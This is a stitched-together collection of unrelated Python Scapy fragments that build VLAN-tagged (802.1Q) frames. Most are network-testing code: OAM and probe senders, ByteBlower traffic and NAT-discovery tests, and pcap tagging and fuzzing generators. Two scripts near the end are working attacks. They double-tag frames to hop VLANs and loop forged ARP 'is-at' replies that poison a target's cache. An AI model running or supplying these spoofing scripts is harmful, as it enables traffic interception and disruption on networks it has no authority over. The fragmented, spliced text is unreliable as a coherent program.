def send_frame(self, frame_body): PACKET = Ether() PACKET.length = 64 PACKET.dst = self.dst PACKET.src = self.getHwAddr(self.interface) if self.stag: # WARNING: September/2016: This should be 0x88a8, but the Intel 10G # hardware I am currently using does not support receiving a TPID of # 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100. # (NOTE: The Intel hardware can send a TPID of 0x88a8) PACKET.type = 0x8100 if self.ctag: PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag)) PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag)) else: PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag)) else: if self.ctag: PACKET.type = 0x8100 PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag)) else: PACKET.type = self.etype # PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag)) PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU() PACKET/=frame_body PACKET/=EndOfPDU() if (self.verbose == True): PACKET.show() print '###[ Frame Length %d (before padding) ]###' % len(PACKET) if (self.hexdump == True): print hexdump(PACKET) if (self.dryrun != True): sendp(PACKET, iface=self.interface, verbose=self.verbose) time.sleep(self.sleep) return PACKET
def main(): if len(sys.argv) < 4: print 'pass 3 arguments: <destination> <vlan ID> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() ip_addr = get_if_addr(iface) vlanID = int(sys.argv[2]) #print 'iface %s' % iface #print 'iface ip @ %s' % ip_addr pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / Dot1Q( vlan=5) / Dot1Q(vlan=vlanID) / IP( src=ip_addr, dst=addr, options=IPOption_MRI( count=0, swtraces=[])) / UDP(dport=4321, sport=1234) / sys.argv[3] # pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( # dst=addr, options = IPOption_MRI(count=2, # swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP( # dport=4321, sport=1234) / sys.argv[2] #pkt.show2() #hexdump(pkt) try: for i in range(int(sys.argv[4])): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def ndpPing(mac, vlan, ip): src_mac = get_ether_address(network.BRIDGE_NAME) packet = Ether(src=src_mac, dst=mac) if_name = vlan if '.' in vlan: if_name, vlan_id = vlan.rsplit('.', 1) vlan_id = int(vlan_id) if vlan_id: packet = packet / Dot1Q(vlan=vlan_id) local_ip = None for ip6 in netconf.get_current_ipv6(cidr=False)['ips']: if ip6.startswith('fe80'): local_ip = ip6 else: src_ip = ip6 break else: if local_ip is None: src_ip = 'fe80::66:66' # we need a source IP... else: src_ip = local_ip packet = packet / IPv6(src=src_ip, dst=ip) packet = packet / ICMPv6ND_NS(tgt=ip) sendp(packet, iface=if_name)
def pkt(self): pkt = Ether(dst=self.cfg["dst"], src=self.cfg.get("src", None)) vid = self.cfg.get("vid", None) if vid is not None: pkt = pkt / Dot1Q(vlan=vid) return pkt
def packet_out(self, in_port, out_port, data): in_port = "CONTROLLER" if in_port == ofp.OFPP_CONTROLLER else in_port print "PACKET OUT (%s => %s): " % (in_port, out_port) hexdump(data) if self.in_out_iface is not None: try: # disect the packet pkt = Ether(data) # remove payload from Ether frame payload = pkt.payload payload_type = pkt.type pkt.remove_payload() # insert Dot1Q shim with vlan_id = out_port if self.in_out_stag is None: ## WARNING -- This was changed from 0x88a8 to 0x8100 when ## testing with the Intel XL710 quad 10GE boards. The ## XL710 does not support the TPID for the STAG. ## ## Long term, it should be changed back to 0x88a8! ## pkt.type = 0x8100 new_pkt = pkt / Dot1Q(vlan=out_port, type=payload_type) / payload else: pkt.type = 0x8100 new_pkt = (pkt / Dot1Q(vlan=self.in_out_stag, type=0x8100) / Dot1Q(vlan=out_port, type=payload_type) / payload) # send out the packet sendp(new_pkt, iface=self.in_out_iface) except Exception, e: logging.exception( "Could not parse packet-out data as scapy.Ether:\n") logging.error(hexdump(data, 'return'))
def send_arp(iface, src_ip, vlan, src_mac, dst_ip, silence=False): if vlan == 0: pkt = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac, type=0x0806) else: pkt = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac, type=0x8100) / Dot1Q( vlan=vlan, prio=0) pkt = pkt / ARP(hwtype=0x0001, ptype=0x0800, op=0x0001, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=src_mac, psrc=src_ip, pdst=dst_ip) if not silence: print '>', print_arp_packet(pkt, 'REQUEST') sendp(pkt, iface=iface, verbose=0)
def send_icmp(iface, src_ip, vlan, src_mac, dst_ip, dst_mac, ip_id, icmp_id, icmp_seq, ttl, protocol): if vlan == 0: pkt = Ether(dst=dst_mac, src=src_mac, type=0x0800) else: pkt = Ether(dst=dst_mac, src=src_mac, type=0x8100) / Dot1Q(vlan=vlan, prio=0) pkt = pkt / IP(id=ip_id, src=src_ip, dst=dst_ip, ttl=ttl, len=(len(icmp_payload) + 28)) / ICMP( id=icmp_id, seq=icmp_seq) / icmp_payload if protocol == 'ICMP': print '>', print_icmp_packet(pkt) else: print '>', print_traceroute(pkt, 'REQUEST') sendp(pkt, iface=iface, verbose=0)
def arpPing(mac, vlan, ip): src_mac = get_ether_address(network.BRIDGE_NAME) packet = Ether(src=src_mac, dst=mac) if_name = vlan if '.' in vlan: if_name, vlan_id = vlan.rsplit('.', 1) vlan_id = int(vlan_id) if vlan_id: packet = packet / Dot1Q(vlan=vlan_id) try: src_ip = netconf.get_current_ipv4(cidr=False)['ips'][0] except IndexError: src_ip = '169.254.66.66' # we need a source IP... packet = packet / ARP(hwsrc=src_mac, psrc=src_ip, hwdst=mac, pdst=ip) sendp(packet, iface=if_name)
def main(): if len(sys.argv) < 3: print("Pass 3 arguments: <interface> <destination>") exit(1) addr = socket.gethostbyname(sys.argv[2]) iface = sys.argv[1] print("Sending on interface %s to %s" % (iface, str(addr))) while True: print # s = str(raw_input('Type space separated port nums ' # '(example: "2 3 2 2 1") or "q" to quit: ')) s = str( input( "Type (1) for hs-fra->ams->hd, (2) for hs->fra->bud->ams->hd or (q) to quit: " "")) if s == "q": break if s == "1": option = 2453734152 elif s == "2": option = 13895308368653518001 else: continue pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / Dot1Q(vlan=101) try: # pkt = pkt / SourceRoute(nrouteid=int(p)) pkt = pkt / SourceRoute(nrouteid=option) except ValueError: pass pkt = pkt / IP(dst=addr) / UDP(dport=4321, sport=1234) pkt.show2() for i in range(20): sendp(pkt, iface=iface, verbose=False) time.sleep(1)
def send_tcp(iface, src_ip, vlan, src_mac, dst_ip, dst_mac, ip_id, src_port, dst_port, tcp_seq): if vlan == 0: pkt = Ether(dst=dst_mac, src=src_mac, type=0x0800) else: pkt = Ether(dst=dst_mac, src=src_mac, type=0x8100) / Dot1Q(vlan=vlan, prio=0) pkt = pkt / IP( id=ip_id, src=src_ip, dst=dst_ip, len=40, ) / TCP( sport=src_port, dport=dst_port, seq=tcp_seq, flags='S', ) print '>', print_tcp_packet(pkt) sendp(pkt, iface=iface, verbose=0)
def main(): if len(sys.argv) < 2 or len(sys.argv) > 4: print "Usage: send.py <target_ip> [<target_mac>] [<vlan_id>]" sys.exit(1) dstip = sys.argv[1] if len(sys.argv) > 2: dstmac = sys.argv[2] else: dstmac = "FF:FF:FF:FF:FF:FF" if len(sys.argv) > 3: vid = long(sys.argv[3]) else: vid = None while (1): msg = raw_input("What do you want to send: ") if vid is None: sendp(Ether(dst=dstmac) / IP(dst=dstip) / msg) else: sendp(Ether(dst=dstmac) / Dot1Q(vlan=vid) / IP(dst=dstip) / msg)
def __create_packets(self): pkts = [] srcmac_str = self.l2fields['srcmac'] dstmac_str = self.l2fields['dstmac'] vlan = self.l2fields['vlan'] l2payload_size = self.l2fields['l2payload_size'] if 0 == l2payload_size: l2payload_size = DEFAULT_LEN l2payload = L2Payload(_l2payload='\x01' * l2payload_size) for _ in range(self.totpkts): pkt = Ether(src=srcmac_str, dst=dstmac_str) if self.l2fields_inc['srcmac']: srcmac_str = _inc_mac(srcmac_str) if self.l2fields_inc['dstmac']: dstmac_str = _inc_mac(dstmac_str) if vlan != 0: pkt = pkt / Dot1Q(vlan=vlan) if self.l2fields_inc['vlan']: vlan = _inc_vlan(vlan) pkt = pkt pkt = pkt / l2payload pkts.append(pkt) return pkts
def run(self): byteblower_instance = ByteBlower.InstanceGet() print("Connecting to ByteBlower server %s..." % self.server_address) self.server = byteblower_instance.ServerAdd(self.server_address) print("Creating ports") # Do check the provision_port code. The vlan has # a small impact there. self.port_1 = self.provision_port(self.port_1_config) self.port_2 = self.provision_port(self.port_2_config) # Creating the stream where we'll sent the traffic from. # Most is the same as the basic IPv4 example. stream = self.port_1.TxStreamAdd() stream.NumberOfFramesSet(self.number_of_frames) stream.InterFrameGapSet(self.interframegap_ns) frame = stream.FrameAdd() # Collect the basic addressing info for the Tx side. # VLAN id handled lower in the code. src_ip = self.port_1_config['ip_address'] src_mac = self.port_1.Layer2EthIIGet().MacGet() dst_ip = self.port_2_config['ip_address'] dst_mac = self.port_1.Layer3IPv4Get().Resolve(dst_ip) frame_size = 512 udp_src = 4096 udp_dest = 4096 payload = 'a' * (frame_size - 42) from scapy.layers.inet import UDP, IP, Ether from scapy.all import Raw # We will need to add a VLAN layer in the frame to transmit. # In scapy Vlans are represented in the Dot1Q class. from scapy.all import Dot1Q udp_payload = Raw(payload.encode('ascii', 'strict')) udp_header = UDP(dport=udp_dest, sport=udp_src) ip_header = IP(src=src_ip, dst=dst_ip) eth_header = Ether(src=src_mac, dst=dst_mac) # A stream will always send the packet just as configured. # When the Tx ByteBlower port has a VLAN, we need to add it to frame to # be sent. The following lines are the only difference compared to # the basic IPv4 example. if 'vlan' in self.port_1_config: vlan_id = self.port_1_config['vlan'] vlan_header = Dot1Q(vlan=vlan_id) scapy_frame = eth_header / vlan_header / ip_header / udp_header / udp_payload else: scapy_frame = eth_header / ip_header / udp_header / udp_payload # As noted above, the remainder of the stream config is the same again. frame_content = bytearray(bytes(scapy_frame)) hexbytes = ''.join((format(b, "02x") for b in frame_content)) frame.BytesSet(hexbytes) # create a trigger to count the number of received frames. # Similar to the stream we will need to make a slight modification # for the Vlan layer. trigger = self.port_2.RxTriggerBasicAdd() # The BPF filter on a trigger is promiscous: it will be applied to all # traffic that arrives at the Physical interface. # # When we expect to receive packets with a VLAN, we need to add # this element to the filter. if 'vlan' in self.port_2_config: rx_vlan_id = str(self.port_2_config['vlan']) bpf_filter = "vlan {} and ip dst {} and udp port {}".format( rx_vlan_id, dst_ip, udp_dest) else: bpf_filter = "ip dst {} and udp port {}".format(dst_ip, udp_dest) trigger.FilterSet(bpf_filter) # The above filter was the last change necessary in this method. # The remainder, result gathering and cleanup is the same. # VLAN info will be list in the port description below. print("Current ByteBlower configuration:") print("port1:", self.port_1.DescriptionGet()) print("port2:", self.port_2.DescriptionGet()) print("Starting traffic") trigger.ResultClear() stream_history = stream.ResultHistoryGet() trigger_history = trigger.ResultHistoryGet() duration_ns = self.interframegap_ns * self.number_of_frames duration_s = duration_ns / 1000000000 + 1 # Running the test. No difference here. # For more info on specific methods, do look into # the API specification (http:\\api.byteblower.com) # or the ipv4.py example. stream.Start() for iteration in range(1, int(duration_s)): sleep(1) stream_history.Refresh() trigger_history.Refresh() last_interval_tx = stream_history.IntervalLatestGet() last_interval_rx = trigger_history.IntervalLatestGet() print("Sent {TX} frames, received {RX} frames".format( TX=last_interval_tx.PacketCountGet(), RX=last_interval_rx.PacketCountGet())) print("Done sending traffic (time elapsed)") print("Waiting for a second") sleep(1) # Collect and show the results. stream_result = stream.ResultGet() trigger_result = trigger.ResultGet() stream_result.Refresh() print("Stream result:", stream_result.DescriptionGet()) trigger_result.Refresh() print("Trigger result:", trigger_result.DescriptionGet()) tx_frames = stream_result.PacketCountGet() rx_frames = trigger_result.PacketCountGet() print("Sent {TX} frames, received {RX} frames".format( TX=tx_frames, RX=rx_frames)) return [tx_frames, rx_frames]
def resolve(cls, wan_device, private_device, udp_src_port, udp_dst_port): from scapy.layers.inet import UDP, IP, Ether from scapy.layers.inet6 import IPv6 from scapy.all import Dot1Q wan_port = wan_device.bbport private_port = private_device.bbport private_l3 = private_port.Layer3IPv4Get() if private_device.iptype == 6: private_l3 = private_port.Layer3IPv6Get() private_ip = private_device.ip private_mac = private_port.Layer2EthIIGet().MacGet() cap = None stream = None try: resolved_mac = private_l3.Resolve(wan_device.ip) stream = private_port.TxStreamAdd() bb_frame = stream.FrameAdd() scapy_frame = Ether(src=private_mac, dst=resolved_mac) for vlan_id in private_device.vlans: scapy_frame /= Dot1Q(vlan=vlan_id) if private_device.iptype == 4: scapy_frame /= IP(src=private_ip, dst=wan_device.ip) else: scapy_frame /= IPv6(src=private_ip, dst=wan_device.ip) scapy_frame /= UDP(dport=udp_dst_port, sport=udp_src_port) scapy_frame /= 'Excentis NAT Discovery packet' frame_content = bytearray(bytes(scapy_frame)) hexbytes = ''.join((format(b, "02x") for b in frame_content)) # Send a single Probing frame. bb_frame.BytesSet(hexbytes) stream.NumberOfFramesSet(10) stream.InterFrameGapSet(1000 * 1000) # 1 millisecond in nanos. cap = wan_port.RxCaptureBasicAdd() filter_elements = [] for vlan in wan_device.vlans: filter_elements.append("vlan %d" % vlan) # normal filter: if wan_device.iptype == 4: filter_elements.append("ip dst %s" % wan_device.ip) else: filter_elements.append("ip6 dst %s" % wan_device.ip) filter_elements.append("udp port %d" % udp_dst_port) bpf_filter = ' and '.join(filter_elements) cap.FilterSet(bpf_filter) cap.Start() stream.Start() # Stop as soon as you receive any response. while True: sniffed = cap.ResultGet() sniffed.Refresh() if sniffed.PacketCountGet() > 2: break time.sleep(0.1) # The Capture needs to stopped explicitly. cap.Stop() # Process the response: retrieve all packets. for f in sniffed.FramesGet(): data = bytearray(f.BufferGet()) raw = Ether(data) if IP in raw and UDP in raw: discovered_ip = raw['IP'].getfieldval('src') discovered_udp_port = raw['UDP'].getfieldval('sport') return discovered_ip, discovered_udp_port if IPv6 in raw and UDP in raw: discovered_ip = raw['IPv6'].getfieldval('src') discovered_udp_port = raw['UDP'].getfieldval('sport') return discovered_ip, discovered_udp_port raise RuntimeError("NAT detection frames didn't get through") finally: if stream is not None: private_port.TxStreamRemove(stream) if cap is not None: wan_port.RxCaptureBasicRemove(cap)
def create_between(self, name, flow_number, source, destination, number_of_frames=None, duration=None): """Create a flow for the current traffic profile :type name: str :type flow_number: int :type source: Device :type destination: Device :type number_of_frames: int :type duration: datetime.timedelta :rtype: UdpFlow """ if source.iptype != destination.iptype: raise RuntimeError("Source and destination devices do not have the" "same IP configuration!" "IPv4 vs IPv6") if number_of_frames is None: duration_s = duration.total_seconds() number_of_frames = int(math.ceil(duration_s * 1e9 / self.interframegap_ns)) udp_src = 4096 + flow_number udp_dest = 4096 + flow_number # Collect the basic addressing info for the Tx side. # VLAN id handled lower in the code. src_ip = source.ip src_mac = source.bbport.Layer2EthIIGet().MacGet() source_l3 = source.bbport.Layer3IPv4Get() if source.iptype == 6: source_l3 = source.bbport.Layer3IPv6Get() dst_ip = destination.ip logging.info("Resolving destination MAC for %s", dst_ip) dst_mac = source_l3.Resolve(dst_ip) frame_dst_ip = destination.ip frame_dst_port = udp_dest filter_dst_ip = destination.ip filter_dst_port = udp_dest if source.nat and destination.nat: raise RuntimeError("Cannot resolve traffic between multiple NAT ports") if source.nat: # no need to resolve here, since we only trigger on # destination parameters pass if destination.nat: logging.info("Resolving NAT parameters") # destination port is behind a NAT, probably need to 'poke' a hole frame_dst_ip, frame_dst_port = NATResolver.resolve( wan_device=source, private_device=destination, udp_src_port=udp_src, udp_dst_port=udp_dest ) logging.info("Resolving destination MAC for %s", frame_dst_ip) dst_mac = source_l3.Resolve(dst_ip) stream = source.bbport.TxStreamAdd() stream.NumberOfFramesSet(number_of_frames) stream.InterFrameGapSet(self.interframegap_ns) frame = stream.FrameAdd() frame_overhead = 42 # IPv6 header is larger than an IPv4 header if source.iptype == 6: frame_overhead = 62 payload = 'a' * (self.frame_size - frame_overhead) from scapy.layers.inet import UDP, Ether from scapy.all import Raw, Dot1Q # A stream will always send the packet just as configured. # When the Tx ByteBlower port has a VLAN, we need to add it # to frame to be sent. # The following 5 lines are the only difference compared # to the basic IPv4 example. scapy_frame = Ether(src=src_mac, dst=dst_mac) for vlan_id in source.vlans: scapy_frame /= Dot1Q(vlan=vlan_id) if source.iptype == 4: from scapy.layers.inet import IP scapy_frame /= IP(src=src_ip, dst=frame_dst_ip) else: from scapy.layers.inet6 import IPv6 scapy_frame /= IPv6(src=src_ip, dst=frame_dst_ip) scapy_frame /= UDP(dport=frame_dst_port, sport=udp_src) scapy_frame /= Raw(payload.encode('ascii', 'strict')) logging.debug('Created frame %s', repr(scapy_frame)) frame_content = bytearray(bytes(scapy_frame)) hexbytes = ''.join((format(b, "02x") for b in frame_content)) frame.BytesSet(hexbytes) # create a trigger to count the number of received frames. # Similar to the stream we will need to make a slight modification # for the Vlan layer. trigger = destination.bbport.RxTriggerBasicAdd() # The BPF filter on a trigger is promiscuous: it will be applied to all # traffic that arrives at the Physical interface. # # When we expect to receive packets with a VLAN, we need to add # this element to the filter. filter_elements = [] for vlan in destination.vlans: filter_elements.append("vlan %d" % vlan) # normal filter: if destination.iptype == 4: filter_elements.append("ip dst %s" % filter_dst_ip) else: filter_elements.append("ip6 dst %s" % filter_dst_ip) filter_elements.append("udp port %d" % filter_dst_port) bpf_filter = ' and '.join(filter_elements) trigger.FilterSet(bpf_filter) return UdpFlow(name, stream, trigger)
size = int(sys.argv[2]) # Traffic option is used to choose between fuzzy or simple packet type. if len(sys.argv) > 3: traffic_opt = str(sys.argv[3]) else: traffic_opt = "" pktdump = PcapWriter(path, append=False, sync=True) pkt = [] for i in range(0, size): if traffic_opt == "fuzzy": eth = Ether(src=RandMAC(), dst=RandMAC()) vlan = Dot1Q() udp = UDP(dport=RandShort(), sport=RandShort()) ipv4 = IP(src=RandIP(), dst=RandIP(), len=random.randint(0, 100)) ipv6 = IPv6(src=RandIP6(), dst=RandIP6(), plen=random.randint(0, 100)) tcp = TCP(dport=RandShort(), sport=RandShort(), flags='S', dataofs=random.randint(0, 15)) # IPv4 packets with fuzzing pkt.append(fuzz(eth / ipv4 / udp)) pkt.append(fuzz(eth / ipv4 / tcp)) pkt.append(fuzz(eth / vlan / ipv4 / udp)) pkt.append(fuzz(eth / vlan / ipv4 / tcp)) # IPv6 packets with fuzzing pkt.append(fuzz(eth / ipv6 / udp)) pkt.append(fuzz(eth / ipv6 / tcp))
if len(sys.argv) not in (3, 4): raise SystemExit("Usage: " + sys.argv[0] + " input.pcap output.pcap [vlan-id]") VLAN_ID = 42 if len(sys.argv) == 4: try: VLAN_ID = int(sys.argv[3]) except: raise SystemExit("'" + sys.argv[3] + "' is not a valid VLAN identifier") packets = [] for packet in rdpcap(sys.argv[1]): layer = packet.firstlayer() while not isinstance(layer, NoPayload): if type(layer) is Ether: # adjust ether type layer.type = 0x8100 # add 802.1q layer between Ether and IP dot1q = Dot1Q(vlan=VLAN_ID) dot1q.add_payload(layer.payload) layer.remove_payload() layer.add_payload(dot1q) layer = dot1q layer = layer.payload packets.append(packet) wrpcap(sys.argv[2], packets)
try: from scapy.all import RandMAC, RandIP, PcapWriter, RandIP6, RandShort, fuzz from scapy.all import IPv6, Dot1Q, IP, Ether, UDP, TCP except ModuleNotFoundError as err: print(err + ": Scapy") import sys path = str(sys.argv[1]) + "/pcap/fuzzy.pcap" pktdump = PcapWriter(path, append=False, sync=True) for i in range(0, 2000): # Generate random protocol bases, use a fuzz() over the combined packet # for full fuzzing. eth = Ether(src=RandMAC(), dst=RandMAC()) vlan = Dot1Q() ipv4 = IP(src=RandIP(), dst=RandIP()) ipv6 = IPv6(src=RandIP6(), dst=RandIP6()) udp = UDP(dport=RandShort(), sport=RandShort()) tcp = TCP(dport=RandShort(), sport=RandShort()) # IPv4 packets with fuzzing pktdump.write(fuzz(eth / ipv4 / udp)) pktdump.write(fuzz(eth / ipv4 / tcp)) pktdump.write(fuzz(eth / vlan / ipv4 / udp)) pktdump.write(fuzz(eth / vlan / ipv4 / tcp)) # IPv6 packets with fuzzing pktdump.write(fuzz(eth / ipv6 / udp)) pktdump.write(fuzz(eth / ipv6 / tcp)) pktdump.write(fuzz(eth / vlan / ipv6 / udp))
#!/usr/bin/env python # coding=utf-8 import time from scapy.all import sendp, ARP, Ether, Dot1Q iface = 'eth0' tatget_ip = '192.168.1.100' fake_ip = '192.168.1.200' fake_mac = '11:22:33:aa:bb:cc' self_vlan = 1 target_vlan = 2 packet = Ether()/ \ Dot1Q(vlan=self_vlan) / \ Dot1Q(vlan=target_vlan) / \ ARP(hwsrc=fake_mac, pdst=tatget_ip, psrc=fake_ip, op='is-at') while True: sendp(packet, iface=iface) time.sleep(2)
def get_dot1q(self, vlan): return Dot1Q(vlan=vlan)
def sendUDPBroadcast(ip="255.255.255.255", sport=5060, dport=5050): scapy.all.sendp( Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=1)/IP(dst=ip)/UDP(sport=sport,dport=dport)/Raw(load=b'\xa5\x00\x00\x00\x00\x02\x00\x00\x47\x23') )
#!/usr/bin/python3 import time from scapy.all import sendp, ARP, Ether, Dot1Q iface = "enp3s0f1" target_ip = '192.168.13.23' fake_ip = '192.168.13.5' fake_mac = 'c0:d3:de:ad:be:ef' our_vlan = 1 target_vlan = 2 packet = Ether() / \ Dot1Q(vlan=our_vlan) / \ Dot1Q(vlan=target_vlan) / \ ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at") while True: sendp(packet, iface=iface) time.sleep(10)